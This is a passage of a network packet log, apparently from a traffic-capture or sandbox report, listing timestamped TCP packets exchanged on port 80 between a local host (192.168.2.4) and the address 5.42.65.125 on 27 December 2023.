Dec 27, 2023 17:57:25.664133072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.664145947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.664153099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.664186001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.664196014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.665838003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665853977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665868044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665885925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665899038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665899038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.665915966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665935040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.665945053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665960073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665970087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.665978909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.665994883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.666001081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.666032076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.666675091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.666750908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.666764021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.666778088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.666790962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.666821003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.667373896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.667390108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.667403936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.667418003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.667434931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.667459965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.667494059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.667494059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.667511940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.668318033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.668333054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.668345928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.668359995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.668369055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.668396950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.668399096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.668412924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.668431997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.669300079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.669317007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.669328928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.669344902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.669358015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.669359922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.669370890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.669374943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.669403076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.670238018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.670252085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.670265913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.670321941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.670336008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.670344114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.670351982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.670366049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.670393944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.671205997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.671281099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.671297073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.671310902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.671324015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.671330929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.671344042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.671360970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.671374083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.672161102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.672199011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.672250032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.672271967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.672286987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.672300100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.672313929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.672318935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.672346115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.673197985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.673213959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.673247099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.673273087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.673288107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.673304081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.673315048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.673317909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.673341990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.674254894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.674271107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.674283028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.674298048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.674316883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.674320936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.674331903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.674343109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.674360991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.675072908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675090075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675149918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.675396919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675412893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675452948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.675534964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675549984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675585985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675587893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.675601006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.675623894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.676599979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.676641941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.676656008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.676661015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.676687956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.676702976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.676724911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.676736116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.676764965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.677283049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.677298069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.677347898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.677360058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.677376032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.677402973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.677405119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.677417994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.677462101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.678278923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.678294897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.678327084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.678354025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.678369999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.678388119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.678401947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.678404093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.678430080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.679173946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.679200888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.679234982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.679240942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.679284096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.679308891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.679358006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.679373026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.679428101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.680157900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.680174112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.680187941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.680202961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.680211067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.680219889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.680237055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.680244923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.680279970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.681051016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.681101084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.681140900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.681158066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.681170940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.681176901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.681189060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.681200981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.681226969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.682059050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682075977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682090044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682102919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682117939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682132006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682141066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.682178020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.682962894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.682977915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683012009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.683249950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683264971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683290005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.683322906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683337927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683352947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683363914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.683370113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.683392048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.684158087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.684174061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.684187889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.684222937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.684225082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.684247971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.684251070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.684264898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.684287071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.685118914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.685168028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.685199976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.685215950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.685230970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.685245037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.685256958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.685259104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.685280085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.686043978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.686086893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.686115980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.686131954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.686146975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.686161995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.686170101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.686177015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.686203957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.686979055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687092066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687105894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687120914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687133074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.687135935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687151909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687161922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.687179089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.687971115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687987089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.687999964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688036919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.688055038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688061953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.688071966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688086987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688107967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.688915014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688930035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688956022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688963890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.688973904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.688991070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689003944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689018011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.689047098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.689831018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689848900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689877987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.689909935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689924955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689938068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689951897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.689955950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.689968109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.690767050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.690783024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.690812111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.691082954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.691102028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.691116095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.691143990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.691160917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.691178083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.691195011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.691196918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.691219091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.692065001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692080975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692094088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692106962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.692109108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692128897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692136049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.692143917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692168951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.692919970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692959070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692971945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692990065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.692996979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.693006039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693021059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693030119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.693043947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.693865061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693881989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693896055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693909883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693917036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.693927050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693941116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.693945885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.693970919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.695924044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.695940018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.695951939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.695966005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.695979118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.695985079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696001053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696006060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696024895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696091890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696105957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696120024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696127892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696137905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696154118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696158886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696168900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696191072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696615934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696686983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696732998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696737051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696753025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696768045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696774006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.696785927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.696804047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.697567940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.697583914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.697612047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.697658062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.697673082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.697685957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.697700024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.697700024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.697725058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.698543072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698561907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698591948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.698815107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698832035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698846102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698853970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.698888063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.698945999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698961973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.698978901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.699019909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.699703932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.699754000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.699775934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.699795008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.699809074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.699824095 CET	80	49738	5.42.65.125	192.168.2.4
